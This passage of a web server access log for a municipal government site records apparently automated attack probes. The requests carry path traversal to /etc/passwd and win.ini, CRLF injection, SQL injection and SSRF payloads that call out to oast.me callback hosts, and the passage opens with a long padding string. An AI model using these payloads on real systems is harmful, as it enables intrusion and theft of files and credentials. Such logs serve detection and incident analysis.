AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://cudo29mjalo72u293ingecqxghrg8mrzo.oast.me/ HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.13.10 (KHTML, like Gecko) Version/17.2.97 Safari/616.13.10" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:47:39 -0600] "GET 
/api/logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1; HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4) AppleWebKit/616.33 (KHTML, like Gecko) Version/17.6 Safari/616.33" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:47:40 -0600] "GET /%5C../ssl/yaws-key.pem HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:47:40 -0600] "GET /../../../../../../../../windows/win.ini HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:02:00 -0600] "GET /+CSCOE+/session_password.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.3.25" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:18:41 -0600] "GET /%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.16 (KHTML, like Gecko) Version/17.0.90 Safari/616.16" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:18:43 -0600] "POST /index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3dcreated%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d-1910%27)+OR+6100%3d6100%23%26type%3d HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:18:44 -0600] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://cudo29mjalo72u293ingq9t8batigr9no.oast.me HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, 
like Gecko) Chrome/126.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:18:45 -0600] "GET /api/settings/values HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:18:49 -0600] "GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (X11; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:18:54 -0600] "GET /dms/admin/accounts/payment_history.php?account_id=2%27 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Debian; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:19:44 -0600] "GET /WealthT24/GetImage?docDownloadPath=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:19:46 -0600] "GET /WealthT24/GetImage?docDownloadPath=c:/windows/win.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:19:47 -0600] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX
&dSecurityGroup&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.17" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:19:56 -0600] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:20:00 -0600] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX
HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:20:06 -0600] "GET /fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:20:14 -0600] "GET /fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1" 406 226 "-" "Mozilla/5.0 (SS; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" chocholayucatan.gob.mx 192.185.131.128